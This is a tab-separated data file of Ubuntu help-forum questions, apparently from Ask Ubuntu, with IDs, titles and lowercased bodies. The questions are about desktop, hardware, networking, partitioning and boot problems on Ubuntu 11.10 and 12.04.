115234	why are applications closing in gnome classic when i minimise them ?	new to linux and have just installed ubuntu 11.10 secured . am running gnome classic menu but notice that my applications are closing when i minimize them . can anyone tell me how to correct this ?
115235	hp probook touchpad	i wrote about this problem some weeks ago , but now the question is : `` why is touchpad works not so good as in windows '' . i tried some `` experiments '' : when i use windows and if i accidentally touched touchpad - cursor is n't moving , also no clicks occurring . so in windows working with touchpad is quite normal , but in ubuntu đ°f i accidentally touch the touchpad even with my wrist - cursor is moving etc . in windows , the cursor moves only when i touch it with finger . and ... if , for example , i hold one finger on touchpad and simultaneously move the second finger on the touchpad - the cursor does n't move , however in ubuntu he does . he 's `` super sensetive '' in ubuntu or what ? also i tried to apply the option in `` mouse and touchpad '' , which called `` disable touchpad when typing '' , but nevertheless he is n't disabling when i 'm typing ... note : this option is circled in red frame , i dont know is it a good `` sign '' ) what can i do to fix the problem ?
115238	i want to record a screencast of a processing sketch	i have a created a music visualisation using processing . i now want to convert that to a video , and the least obtrusive way i could think of is to record a screencast . i figured exporting processing to video including audio , from within processing itself , on ubuntu seemed an unsolved issue . very hard and also could cause timing sync issues ( since the music keeps running while images are captured ) . so move on to the screencast method . dead-easy , i figured . but i was wrong . first hurdle was to find a way to record the sound from the audio ( and not the mic ) . i did find a tutorial for that here . in short : use gtk-recordmydesktop and pulse audio . exactly : start pulseaudio start gtk-recordmydesktop , and set input from default to pulse start recording see the recording tab in pulseaudio , and selected internal audio ( or monitor ) this works if i record from e.g . my webbrowser playing a youtube movie . i see that appear in the playback tab , and can then easily record it . but not for processing . processing is written in java . processing does not use alsa but uses the hardware devices directly to create the sounds . when the sound is playing , it does not appear in the pulse audio mixer . how can i record the audio now ?
115244	creating a network bridge - gui	are there any gui tools out there to bridge my wireless and ethernet connections , and how would i go about using them ? all the solutions i have found have been using the terminal or i have not managed to figure it out . thanks ,
115246	facebook scrabble and flash	i 'm running ubuntu 11.10 64 bit . i ca n't get scrabble facebook to run in firefox . i installed flash-aid and no joy . help ?
115250	can not scale frequency of a core i7 2720qm	i own a dell latitude e6520 with an intel cpu ( core i7 2720qm ) . after installing cpufrequtils , i get the following message : cpufrequtils 007 : cpufreq-info ( c ) dominik brodowski 2004-2009 veuillez rapportez les erreurs et les bogues ă cpufreq @ vger.kernel.org , s'il vous plait . analyse du cpu 0 : **pas de pilotes cpufreq reconnu pour ce cpu** maximum transition latency : 4294.55 ms . in english : no cpufreq pilot found for this cpu . thus my cpu runs always at full speed ( 2,2 ghz ) which consume the battery and shorten its life . i do n't either know how to activate turbo mode .
115254	how can i motivate the community to use boinc ?	boinc is a really nice application to use on background of a computer that can help science projects and humanity as a all . i would like somehow to encourage people use boinc with their preferences on boinc like projects choice , cpu from 10 to 100 , .. with their computer that will help science to move more quickly and help humanity there are 20 million users of ubuntu if most of use boinc , this will increase the speed of science projets .. and if other people from other operating systems use as also like mac , windows , .. and other open source like debian , .. this would even speed more science and now anyone can win also a prize , joining a project management like http : //boincstats.com/ and there is more 2 web sites how can i get ubuntu users and ubuntu community to know and use boinc application ?
115257	is there a congrats ubuntu page ?	say for example i use a particular package and want to say `` way to go maintainers '' is there a way for me to do this ?
115261	can shell themes be used with gnome fallback mode ?	i was wondering what truly `` gnome fallback '' means in ubuntu ? i am using gnome classic , which is lovely , but i wan na install some new themes . do these themes only work with gnome 3 ? do i have to get gnome 3 and then get themes activated in the advanced settings ? thanks
115263	fullscreen apps restarts x using gnome shell	i am running gnome shell on ubuntu 11.10 ( 32 bits ) . when i run some apps in fullscreen , system restarts x and i go back to the display manager screen ( lightdm ) . it happens for example with mame games and with many other games . it happens , more or less , at the 95 % of the times . in some cases , i do not know why , it does not happen . i have an intel video card . i have tested this on two laptops ; one of these uses an onboard intel video card , and the other one uses the gpu included into the processor ( intel sandy bridge ) . on the same system , this does not happen on unity , gnome classic or kde . is there a fix to this problem ? thanks
115265	updating banshee to 2.4	i have banshee 2.2.1 with ubuntu 11.10 i have been trying to update banshee to 2.4 ( released yesterday ) but it just isnt working , i have been using sudo add-apt-repository ppa : banshee-team/ppa in terminal , from the banshee.fm website . but after running through terminal it says this : sudo add-apt-repository ppa : banshee-team/ppa you are about to add the following ppa to your system : ppa for banshee team this ppa contains the latest stable debs of banshee for ubuntu . to install banshee , you must first enable the ppa on your system : 1 . open software sources ( system- > administration- > software sources ) 2 . navigate to the `` third party sources '' tab . 3 . click `` add '' 4 . enter the apt line below that corresponds to your ubuntu version that starts with `` deb '' . 5 . click `` add source '' 6 . click `` close '' 7 . it will prompt you to reload your software cache . click `` reload '' . 8 . now install the package `` banshee '' from synaptic , or using the command below : sudo apt-get install banshee for those who wish to compile from trunk , add the deb-src line and then run `` sudo apt-get build-dep '' to install all required dependencies before starting to compile . unstable ( version which have odd minor version numbers ) debs of banshee can be found here : https : //launchpad.net/~banshee-team/+archive/banshee-unstable more info : https : //launchpad.net/~banshee-team/+archive/ppa press [ enter ] to continue or ctrl-c to cancel adding it executing : gpg -- ignore-time-conflict -- no-options -- no-default-keyring -- secret-keyring /tmp/tmp.opajxemdqr -- trustdb-name /etc/apt/trustdb.gpg -- keyring /etc/apt/trusted.gpg -- primary-keyring /etc/apt/trusted.gpg -- keyserver hkp : //keyserver.ubuntu.com:80/ -- recv 9d2c2e0a3c88dd807ec787d74874d3686e80c6b7 gpg : requesting key 6e80c6b7 from hkp server keyserver.ubuntu.com gpg : key 6e80c6b7 : `` launchpad ppa for banshee team '' not changed gpg : total number processed : 1 gpg : unchanged : 1 i believe i have the ppa but , im not sure . i need a step by step process to get this , ive been trying to figure it out for quite a while now ...
115268	change browser icon from a ubuntu theme	i 'm modificating some themes to make my own and would like to change the browser arrows . you know the internet browser arrows ? ( back , forward , stop , refresh ) . where i can find it in folder theme ? and other question about that . is possible to make that icons only for internet browser or this will affect all the use of that arrow ? thanks : )
115275	which files do i open most frequently ?	is there a way in ubuntu ( 11.10 to be specific ) to know which files i open most frequently ? that is , which files have been opened the most since installing ubuntu ? i am unsure what to tag this !
115280	how to configure openvpn server in ubuntu 11.10 and openvpn client in windows 7	i 'm really new in linux , so i have lack of knowledge about it . i would like to setup a vpn connection , i choose openvpn as the tool , so can somebody explain me in details how to configure openvpn server ( openvpn access server ) in ubuntu and openvpn client in windows ? thanks !
115285	how to compile fontforge ?	who knows right way to compile fontforge on the ubuntu 11.10 64-bit system ? any experience and suggests will be greatly useful . full guide for build and install from source here : fontforge : building and installing from source ... but my probe was failed . help please .
115286	usb : missing operating system - mac	have installed ubuntu 11.10 on usb using live cd . followed the steps as provided in below link https : //help.ubuntu.com/community/mactelsupportteam/appleintelinstallation after installation is complete in refit menu , when i click on linux icon i receive `` missing operating system '' message . i followed the steps provided in the below link from this forum , but am still receiving the same message . unable to boot : missing operating system any assistance is highly appreciated .
115287	how to restore the shortcut for the `` fancy window switch ?	pressing the `` windows key '' and tab ( mod4+tab ) used to work similar to pressing alt+tab ( which switches windows just like m $ ) , but it showed a much better preview . somehow i lost the shortcut and ca n't find it anymore . i 've gone through the chaos in `` system - > preferences - > keyboard shortcuts '' several times and the only thing i can see there is `` move between windows , using a popup window '' , whatever it means . i prefer the `` fancier '' switcher , how can i restore it ?
115290	what are the contents of a language pack ?	i tried to install language-pack-fr in my ubundu machine . it worked - but i am not clear what are things that get installed as part of the language pack . in general , the language pack contains only fonts for the new language ? or , what are the other contents ?
115293	wireless card unseen by lspci	i installed both ubuntu 8.04 and 10.04 . i tried to install the wireless card . although i succeeded in installing the driver using ndiswrapper , it tells me that the hardware is not present . when i use lspci , it does n't list it . i have this laptop model and i think it should have the same entry about the wireless card here : http : //ubuntuforums.org/showthread.php ? t=1810193 could the problem be other than hardware malfunction ? update : here 's lspci output : 00:00.0 host bridge : ati technologies inc rs480 host bridge ( rev 01 ) 00:01.0 pci bridge : ati technologies inc rs480 pci bridge 00:13.0 usb controller : ati technologies inc ixp sb400 usb host controller 00:13.1 usb controller : ati technologies inc ixp sb400 usb host controller 00:13.2 usb controller : ati technologies inc ixp sb400 usb2 host controller 00:14.0 smbus : ati technologies inc ixp sb400 smbus controller ( rev 11 ) 00:14.1 ide interface : ati technologies inc ixp sb400 ide controller 00:14.3 isa bridge : ati technologies inc ixp sb400 pci-isa bridge 00:14.4 pci bridge : ati technologies inc ixp sb400 pci-pci bridge 00:14.5 multimedia audio controller : ati technologies inc ixp sb400 ac'97 audio controller ( rev 02 ) 00:14.6 modem : ati technologies inc sb400 ac'97 modem controller ( rev 02 ) 00:18.0 host bridge : advanced micro devices [ amd ] k8 [ athlon64/opteron ] hypertransport technology configuration 00:18.1 host bridge : advanced micro devices [ amd ] k8 [ athlon64/opteron ] address map 00:18.2 host bridge : advanced micro devices [ amd ] k8 [ athlon64/opteron ] dram controller 00:18.3 host bridge : advanced micro devices [ amd ] k8 [ athlon64/opteron ] miscellaneous control 01:05.0 vga compatible controller : ati technologies inc radeon xpress 200m 5955 ( pcie ) 05:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl-8139/8139c/8139c+ ( rev 10 ) 05:09.0 cardbus bridge : texas instruments pcixx21/x515 cardbus controller 05:09.2 firewire ( ieee 1394 ) : texas instruments ohci compliant ieee 1394 host controller 05:09.3 mass storage controller : texas instruments pcixx21 integrated flashmedia controller 05:09.4 sd host controller : texas instruments pci6411/6421/6611/6621/7411/7421/7611/7621 secure digital controller unfortunately i 'm using ubuntu 8.04 since it is the last lts that runs with acceptable performance .
115295	about 'adobe flash plugin ' in software center	in software center i find i do not install 'flash plugin ' . but i still can see flash in firefox . what is the matter ? thanks
115301	ubuntu software center 11.10	i have installed ubuntu 11.10 64 bit version . i have setup the network connectivity . i want to use software center to install qemu launcher . however when i search for it in software center , i do not see the `` install '' button on the far right . i saw this in the 32 bit version . is something missing here ? thanks . guest
115303	can i search by application type/usage/category instead of application name in unity application lens ?	most of the times , application search works great in application lens . search for an application name and you will get it . but say if i forgot the application name but only remember its use - say i forgot the name `` avidemux '' but i remember its an video editor , how do i search for it - search for `` video editor '' ? but when i search , its not returning avidemux as search result . so my question is how do i let unity know that avidemux is a video editor and when i search for video editor , it should give me avidemux . should i have to add any metadata to its .desktop file ? how do i solve the same more generically - search not just by application name but by application type and application usage as well ?
115307	shared folders space usage	i am a new user moving from dropbox . the gripe i have with dropbox is that it takes the shared folders size into account for your disk quota . is it the same with ubuntu one ?
115310	how to resize / enlarge / grow a non-lvm ext4 partition	i have already searched the forums , but couldnt find a good suitable answer : i have an ubuntu server 10.04 as kvm host and a guest system , that also runs 10.04 . the host system uses lvm and there are three logical volumes , which are provided to the guest as virtual block devices - one for / , one for /home and one for swap . the guest had been partitioned without lvm . i have already enlarged the logical volume in the host system - the guest successfully sees the bigger virtual disk . however , this virtual disk contains one `` good old '' partition , which still has the old small size . the output of fdisk -l is me @ produktion : / $ lc_all=en_us sudo fdisk -l disk /dev/vda : 32.2 gb , 32212254720 bytes 255 heads , 63 sectors/track , 3916 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000c8ce7 device boot start end blocks id system /dev/vda1 * 1 3917 31455232 83 linux disk /dev/vdb : 2147 mb , 2147483648 bytes 244 heads , 47 sectors/track , 365 cylinders units = cylinders of 11468 * 512 = 5871616 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000f2bf7 device boot start end blocks id system /dev/vdb1 1 366 2095104 82 linux swap / solaris partition 1 has different physical/logical beginnings ( non-linux ? ) : phys= ( 0 , 32 , 33 ) logical= ( 0 , 43 , 28 ) partition 1 has different physical/logical endings : phys= ( 260 , 243 , 47 ) logical= ( 365 , 136 , 44 ) disk /dev/vdc : 225.5 gb , 225485783040 bytes 255 heads , 63 sectors/track , 27413 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00027f25 device boot start end blocks id system /dev/vdc1 1 9138 73398272 83 linux the output of parted print all is model : virtio block device ( virtblk ) disk /dev/vda : 32.2gb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 1 1049kb 32.2gb 32.2gb primary ext4 boot model : virtio block device ( virtblk ) disk /dev/vdb : 2147mb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 1 1049kb 2146mb 2145mb primary linux-swap ( v1 ) model : virtio block device ( virtblk ) disk /dev/vdc : 225gb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 1 1049kb 75.2gb 75.2gb primary ext4 what i want to achieve is to simply grow or resize the partition /dev/vdc1 so that it uses the whole space provided by the virtual block device /dev/vdc . the problem is , that when i try to do that with parted , it complains : ( parted ) select /dev/vdc using /dev/vdc ( parted ) print model : virtio block device ( virtblk ) disk /dev/vdc : 225gb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 1 1049kb 75.2gb 75.2gb primary ext4 ( parted ) resize 1 warning : you are attempting to use parted to operate on ( resize ) a file system . parted 's file system manipulation code is not as robust as what you 'll find in dedicated , file-system-specific packages like e2fsprogs . we recommend you use parted only to manipulate partition tables , whenever possible . support for performing most operations on most types of file systems will be removed in an upcoming release . start ? [ 1049kb ] ? end ? [ 75.2gb ] ? 224gb error : file system has an incompatible feature enabled . compatible features are has_journal , dir_index , filetype , sparse_super and large_file . use tune2fs or debugfs to remove features . so what can i do ? this is a headless production system . what is a safe way to grow this partition ? i can unmount it , though - so this is not the problem . edit : cfdisk showed a small free space unpartitioned space , then the partition ( flagged as `` boot '' and linux/ext3 ) and then the rest of the unpartitioned space . after deleting the partition and creating it again using cfdisk - cfdisk shows one big partitioned area ( which would be fine with me ) and as filesystem type only `` linux '' resize2fs returns this error resize2fs 1.41.11 ( 14-mar-2010 ) resize2fs : bad magic number in super-block while trying to open /dev/vdc1 could n't find valid filesystem superblock
115312	ubuntu on samsung np700z5b - no grub	i just bought a samsung np700z5b laptop . gorgeous machine and great performance ! i do 2 things when i get a new laptop : format the hd and install winblows from a cd to ditch the bloatware install some variant of linux on it ( lately ubuntu ) step 1 worked fine ( until earlier today ) , but i have n't been able to install ubuntu on it for the past 3 days ! i 've tried mint12 , ubuntu 12.04 , ubuntu 11.10 , ubuntu 11.04 and ubuntu 10.04 . the live cd and the installations all run fine and report no problems , but when i reboot grub is nowhere to be found ! the system goes directly to winblows ! i 've tried booting from the livecd and re-installing grub via the chroot and purge & reinstall methods ( https : //help.ubuntu.com/community/grub2 ) and neither makes a difference . i 've also tried copying the boot sector : dd if=/dev/sda of=linux.bin bs=512 count=1 and putting it on c : then setting bcdedit to add the entry to the windows bootloader with no results . earlier today i decided to try and set my boot partition as an efi boot partition ... bad choice , now i do n't even have the winblows boot loader . i 've officially ran out of ideas . tried calling samsung , but they 're closed ( they 'd probably say something stupid along the lines of `` samsung recommends windows 7 '' ... i 've had dell say that to me ) . any help would be greatly appreciated . update 1 tried re-installing 12.04 and now i get the screen continously turning off and back on , but still no sign of booting ... it has been doing it for 15 mins so far ( i set the boot partition type to ext2 instead of ext4 ) update 2 well ... this just gets better and better . i inserted the installation usb key to reboot it and the flickering stopped for about a minute ( remained on ) then it started turning off and on again
115315	i ca n't use my wifi on my asus please help	here it 's the info ! ! please help [ sudo ] password for anon : *-network disabled description : wireless interface product : centrino wireless-n + wimax 6150 vendor : intel corporation physical id : 0 bus info : pci @ 0000:02:00.0 logical name : wlan0 version : 67 serial : 40:25 : c2:69 : a7 : bc width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlagn driverversion=3.0.0-16-generic firmware=41.28.5.1 build 33926 latency=0 link=no multicast=yes wireless=ieee 802.11bgn resources : irq:51 memory : de800000-de801fff *-network description : ethernet interface product : ar8151 v2.0 gigabit ethernet vendor : atheros communications physical id : 0 bus info : pci @ 0000:04:00.0 logical name : eth0 version : c0 serial : 54:04 : a6:03:15 : d0 size : 1gbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vpd bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=atl1c driverversion=1.0.1.0-napi duplex=full firmware=n/a ip=10.0.1.13 latency=0 link=yes multicast=yes port=twisted pair speed=1gbit/s resources : irq:53 memory : dd400000-dd43ffff ioport : a000 ( size=128 ) anon @ ubuntu : ~ $ rfkill list all 0 : asus-wlan : wireless lan soft blocked : no hard blocked : no 1 : asus-wimax : wimax soft blocked : yes hard blocked : no 2 : phy0 : wireless lan soft blocked : no hard blocked : yes
115316	most of the menus are not visible or half visible after updating to libreoffice 3.5.1.2	i was using the default libreoffice with ubuntu 11.10 without any problem , but yesterday after updating to libreoffice 3.5.1.2 , most of the menus are either not visible or half visible . i tried everything , uninstall-reinstall , completely remove from synaptic manager-reinstall etc , but the problem is still there .
115318	skype notification in gnome shell	i have 11.09 ubuntu on my pc , i have installed gnome 3 . when i login , i can see notification of skype in the tray , but i want to keep watching it , i cant do as tray hides by it self , in older version , in the panel i could keep watching it . how to change the panel of gnome3 ? how to put skype notification on the top of the panel ?
115324	can anyone tell me why i have this weird spacing in the terminal ?	please , have a look at this jpg file ... .it is a line i 've just typed into my terminal . it has a rather unusual letter spacing . why is that ? thanks .
115329	how can i submit an app to myapps that is already in a ppa ?	all my applications are already in my ppa in launchpad . now i want to submit them to myapps . but myapps insists in getting something to upload which makes no sense because everything is already uploaded and confirmed in my ppa . i put the information about the ppa in the 'additional notes for the reviewer ' . please help me to proceed .
115333	how do i disable the sleep button on my keyboard ?	i have a `` power button '' on my keyboard that enables standby or hibernate . i ca n't find the mapping of this key anywhere in `` sytem settings > keyboard '' , `` system > power management '' , `` compiz config > or similar ( where i could find it before unity ) . how can i disable ( not remap ) this button ? i do not want to disable hibernate/sleep altogether , it 's simply this key that gets pressed a lot by accident and it 's getting quite annoying .
115336	make ubuntu gnome faster by reducing graphics quality	i 'm running ubuntu 11.10 on virtualbox and performance is really bad . it takes seconds to respond to a click . is it possible to reduce the graphics rendering quality or other unnecessary things , to speeden up the gnome de ? ( like in windows )
115339	how to connect to a serverside process on ubuntu running in a vm ?	i am running ubuntu 11.10 in virtualbox , on windows 7 . i 'm trying to setup a serverside process like apache on it . how do i configure virtualbox to allow access to the ubuntu server process from other computers on the network ? i can access the internet from ubuntu . the windows 7 computer is on a wifi network using dhcp . the wifi network has a dynamic ip with the network provider . this is my current configuration :
115341	usb drive on ubuntu on vm virtualbox	os x is my host os . i have windows xp and ubuntu 10.10 on guest os . they both work great . when i eject usb flash drive from host os , it appears in windows guest os but it does not appear in ubuntu guest os . i never run both guest os at the same time . it 's always either or . i am running , vm virtualbox 4.1.10 and installed latest guest additions and also installed vm virtualbox extension pack .
115346	why does n't resolv.conf remember dns addresses ?	i have installed dnsmasq and added nameserver 127.0.0.1 to the resolv.conf file so i can use wildcards in my apache configuration . but every time i restart the computer or change wi-fi connection i have to add it again to get it working . why is this happening and how can i make it work ?
115349	why does my cursor jump when typing ?	when typing in ubuntu my cursor jumps around and its not application specific . it does n't matter or im filing in a web form , writing an e-mail or using libreoffice or lyx . im using a sony vaio 64bit machine . i read a previous question ( link below ) on this subject which indicates it may have something to do with the touchpad settings . as this has occurred in previous ubuntu distros im guess it is somekind of hardware issue .
115356	how can i find installed web applications ?	i 've installed lamp server using tasksel . i 've installed phpmyadmin , which i know from experience gets in /phpmyadmin . that works . then i installed drupal6 . i assumed that it would get in /drupal , but that 's not the case . how can i find that kind of information ? of course , in this case , i 'm looking for my drupal install , but i would like to avoid having to spend so much time every time i install a web application , so i 'm looking for a generic way .
115358	changed /etc permission in oneiric ( ubuntu11.10 ) by using `` sudo chmod 665 /etc '' cant use sudo now	i screwed up big time . i changed the permission of /etc in ubuntu 11.10 by using following command sudo chmod 665 /etc now when ever i try to use sudo it gives the following error : sudo : ca n't open /etc/sudoers : permission denied sudo : no valid sudoers sources found , quitting any help will be greatly appreciated because i am new to ubuntu . i have already tried using su but it doesnt even login as root and even i give it the right password it always say authentication failure . i do n't want to login as root coz its risky and even a newbie in linux like me is not stupid enough to have such control . i just want to use my sudo again . i have tried to go into recovery mode as well but i ca n't get in to recovery mode .
115359	error with ubuntu : can not open the disk 'd : \my documents\my virtual machines\ubuntu\ubuntu-1.vmdk ' or one of the snapshot disks it depends on	can not open the disk 'd : \my documents\my virtual machines\ubuntu\ubuntu-1.vmdk ' or one of the snapshot disks it depends on . reason : the physical disk is already in use . ====================== when i powered on my ubuntu on vmwave , a window showed up within words above . i tried to remove the old hard disk in settings and created a new one , but it still doesnot work . also , i tried to delete the .lck files and even the doc . but ... ... . has someone solved this problem ? please do me a favour ! ! many thanks ! !
115363	upstart for pydoc webserver	i 'm trying to use upstart so that the pydoc webserver for a package i 'm developing always runs . if i run it from the command line : pydoc -p 7464 /some_path/my_python_package it works fine , and going to localhost:7464/my_python_package displays the documentation . however if i put it in an upstart script , e.g . start on startup start on runlevel [ 2,3,4,5 ] stop on runlevel [ 0,1,6 ] script pydoc -p 7464 /some_path/my_python_package end script then when i open up the browser at localhost:7464/my_python_package i get the following : no python documentation found for 'my_python_package ' note that localhost:7464 shows all of the standard python packages as normal , so it seems like upstart is n't parsing the path correctly . i tried using putting export pythonpath='/some_path ' in and changing the execution line to pydoc -p 7464 $ pythonpath/my_python_package but this did n't work either .
115369	how to play mp3 files from the command line ?	i have installed ubuntu 11.10 server.. so command line only . i need to be able to play audio ( .mp3 & .wav ) files via the command line ! i 've installed the mpd & audacious packages ... and copied some files to a location specified in the .conf file . but what do i do to acutally play the .mp3 files ? ? also , how can i confirm the audio is working correctly ?
115373	reset a usb modem without physical access ( kvm virtual machine )	ubuntu community , im using a usb-modem to connect a virtual machine with the internet . so host and guest do not share the same ip/network . i emulate by qemu-kvm , device forwarding works great with `` -usb -usbdevice host:1c9e:9603 '' . the vm uses ubuntu 10.04 , host 11.10 . unfortunately the modem unmounts after ~3 days . obviously , from now on no connection can be established . after the vm reboots , a connection is possible again . nmcli can be used to establish an internet connection and check whether its still active . but how do i remount the device/modem with a small bash script ? syslog showing , how the device unplugs after being ~3days in use : pppd [ 1369 ] : lcp terminated by peer pppd [ 1369 ] : connect time 1104.9 minutes . pppd [ 1369 ] : sent 1279 bytes , received 790 bytes . kernel : [ 66423.705380 ] device ppp0 left promiscuous mode pppd [ 1369 ] : modem hangup pppd [ 1369 ] : connection terminated . avahi-daemon [ 424 ] : withdrawing workstation service for ppp0 . modem-manager [ 483 ] : ( ttyusb2 ) closing serial port ... networkmanager [ 431 ] : scplugin-ifupdown : devices removed ( path : /sys/devices/virtual/net/ppp0 , iface : ppp0 ) networkmanager [ 431 ] : ( ttyusb2 ) : now unmanaged networkmanager [ 431 ] : ( ttyusb2 ) : device state change : 8 - > 1 ( reason 36 ) networkmanager [ 431 ] : ( ttyusb2 ) : deactivating device ( reason : 36 ) . networkmanager [ 431 ] : could not read ppp stats : no such device networkmanager [ 431 ] : ( ttyusb2 ) : cleaning up ... networkmanager [ 431 ] : ( ttyusb2 ) : taking down device . networkmanager [ 431 ] : unmanaged device found ; state connected forced . ( see http : //bugs.launchpad.net/bugs/191889 ) nm-dispatcher.action : error in get_property : method `` get '' with signature `` ss '' on interface `` org.freedesktop.dbus.properties '' does n't exist # 012 modem-manager [ 483 ] : ( ttyusb2 ) serial port closed modem-manager [ 483 ] : modem /org/freedesktop/modemmanager/modems/0 : state changed ( connected - > disconnecting ) modem-manager [ 483 ] : modem /org/freedesktop/modemmanager/modems/0 : state changed ( disconnecting - > connected ) pppd [ 1369 ] : exit . networkmanager [ 431 ] : disconnect failed : ( 32 ) the serial port is not open . i am afraid , that restarting the usb-deamons on the vm will not be enough - as i will have to tell the qemukvm-manager to forward the device once again . but that would be the second step . regards .
115375	enable on-screen keyboard from the command line	my keyboard just broke down , so i wanted to enable the on-screen keyboard , found in `` universal settings '' , via the command line ( by logging in to that pc via ssh ) ... . unfortunately , i can not find any guidance to doing that - any ideas ?
115376	specific hide delay of the classic gnome panel	is there an option in the gconf-editor or somewhere else where i can adjust the time of the hide delay of the panel in a classic-gnome session ? i found this for gnome2 but does n't work with 12.04 classic panels
115378	how to remove bottom panel in gnome shell	how do you remove that obnoxious pseudo-invisible bottom panel in gnome shell in 11.10 ? network manager is especially annoying , as it will place a large `` network disconnected ! '' tab that wo n't go away until i click on it , as if i was n't already aware i no longer had an internet connection . in 10.04 , it used to make a small growl modal in the upper right hand corner that gradually faded away . i really miss that . how do i get that back and permanently remove the bottom panel ? i 'm aware of various ppas offering shell extensions , but i have n't been able to find one offering this explicit functionality .
115388	is it possible to have window transparency in mutter/gnome shell ?	i really like the transparency effects in compiz with gnome2 and wanted to know if there was any way ( i 'm assuming without using compizconfig ) to have some kind of transparency in the windows . is there something similar to compiz for gnome shell ?
115392	shutdown bar is not appearing anywhere	i am using ubuntu 11.10 in gnome interface and there is no shutdown bar/option appearing on desktop . i have also used some solutions just like : sudo add-apt-repository ppa : webupd8team/gnome3 sudo apt-get update sudo apt-get install gnome-shell-extensions-alternative-status-menu but this is showing some error message in the terminal while typing last command . please provided me with best solutions
115396	run command before automatic backup	i 've been using the deja dupe to run automatic backups on my system . the problem i 'm having is my server at work occasionally times out and essentially un-mounts my windows shares from nautilus . i 'd like to find a way to run nautilus smb : //windowsmountpoint before it deja dupe runs the automatic backup . i ca n't imagine this feature not existing , i just do n't know how to do it !
115397	how do i install 12.04 onto a nilfs root partition ?	i have a brand new ssd and i 'd like to install 12.04 onto it with nilfs as the filesystem for the root partition . i ca n't find any easy way of doing that . if i boot from the 12.04 livecd , i can install nilfs-tools ( i had to download it via wget -- i could n't seem to apt-get it ) and i was able to format a partition as nilfs via mkfs.nilfs . however , when i click `` install ubuntu '' and start the installer and tell it i want to choose the partition , it wants to reformat it and only gives me options for other filesystems ( reiser , ext , etc . ) but no nilfs , even though nilfs support has been installed ( i was able to create a nilfs filesystem on my partition ) . any tips or suggestions ?
115406	how do i report a bug in ubuntu translation ?	i am familiar with reporting bugs on launchpad , but have no idea on how to report a bug in the translation . should i file it against the package that contains this bug , or should i report it as a but in some translation-project ? how to make sure the translators team will get notified ? what information should i include in such a bug report ?
115408	how do i change my control or alt key to emit a space key event ?	i have a laptop with a broken spacebar and i want to map the alt ( right ) , or controlkey to emit a space character ? i am running ubuntu 11.10
115412	why does n't libreoffice work with the hud ?	so i have tried out a couple daily builds and beta 1 , and love hud . however , currently libreoffice does not play nice with hud and i was wondering if there was a way to make it work with hud . kinda like the lo-menubar that applies the menu bar to the global menu , if there was means to get libreoffice to work with hud . or might this question be too soon for an answer ?
115416	is it possible to open multiple instances of software center ?	i was wondering why i ca n't open more than one instance of ubuntu software center ? is there any specific reason for this behaviour ?
115421	how can i make a multiseat with xephyr ?	i 'm trying to use multiseat with ubuntu , but i ca n't make this work . i 've read a lot of `` how to '' , and the most of them are about doing a multiseat with some distro with gdm2 , or kdm . but , i 'm using the lightdm of ubuntu . so now i 'm trying to make this multiseat with xephyr , which i 've already used to make a multiseat with the debian 4 version . but i do n't know how to call xephyr in lightdm.conf .
115427	loading latest firmware iwlwifi-6000	i just installed 11.10 on dell xps 15z . somebody know why kernel does not load the latest firmware for wifi intel centrino advanced-n 6230 . $ modinfo iwlagn |grep iwlwifi-6000 firmware : iwlwifi-6000g2b-5.ucode firmware : iwlwifi-6000g2a-5.ucode firmware : iwlwifi-6000-4.ucode in package linux-firmware there is latest version ( iwlwifi-6000g2b-6.ucode ) $ dpkg -l linux-firmware | grep iwlwifi-6000 /lib/firmware/iwlwifi-6000-4.ucode /lib/firmware/iwlwifi-6000g2a-5.ucode /lib/firmware/iwlwifi-6000g2b-5.ucode **/lib/firmware/iwlwifi-6000g2b-6.ucode**
115429	change distro name from system info	i want to change the name and logo of ubuntu 11.10 from system settings - > system info , how do i do that ? and make it remain that way even after upgrades to like 12.04 ?
115431	confused about what makes up the ubuntu gui	i am now getting more into customizing my ubuntu experience and want to understand better what all these different things i keep running into are . what is gnome3 and gnome2 in relation to gtk3 or gtk2 ? are they related at all ? is gnome3 another version of unity ? what is unity ? what is compiz ? to make this all very basic , the core question is : how is the ubuntu gui built ? what are the elements from the bottom-up that make up the desktop environment ? trying to understand this better so i know what i need/want in order to have my desktop the way i would like it . if this question is better suited for a forum of some sort , please let me know and i will understand completely . thanks in advance !
115432	change boot entry names and grub background ?	how do i change the names of the boot entries and the background of the boot menu ?
115433	what and where to search logs for discover the reason of a spontaneous logout ?	suddendly , without any reasons i can explain , my ubuntu logoff , recovered with ctrl+alt+f1 , login , ctrl+alt+f7 . ok , i was running chrome with flash plug-in , and some terminal bashscript , smalls stuffs . where i can find ( some log files ) and what to look for in an effort to discover or try to explain a little better what really happened ? thanks in any advice .
115435	customize wubi installer ?	i want to customize the wubi installer and change the ubuntu name and logo from the installer as well as from the add/remove programs menu .
115438	bigger space for ubuntu 11.10	i installed ubuntu 11.10 64bit along side windows . i gave it 19gb but now i 'm running out of space . is there any `` easy '' way to make it larger ?
115444	for apple users : need to install ubuntu on mac from portable drive	i 'm trying to install ubuntu in mac and have followed steps mentioned on ubuntu 's website to make my thumb drive bootable . but when i am restarting my mac and press option key , it did n't detect my thumb drive . i am assuming that the issue is because of the format of the drive which is the default fat . is there any other format required ? ?
115446	how to drive a 1080p monitor from a lenovo thinkpad t60 ?	just installed ubuntu 11.10 on the thinkpad . it is in its base that has a displayport output which i route through an adaptor through to the hdmi input of my 1080p tv/monitor .
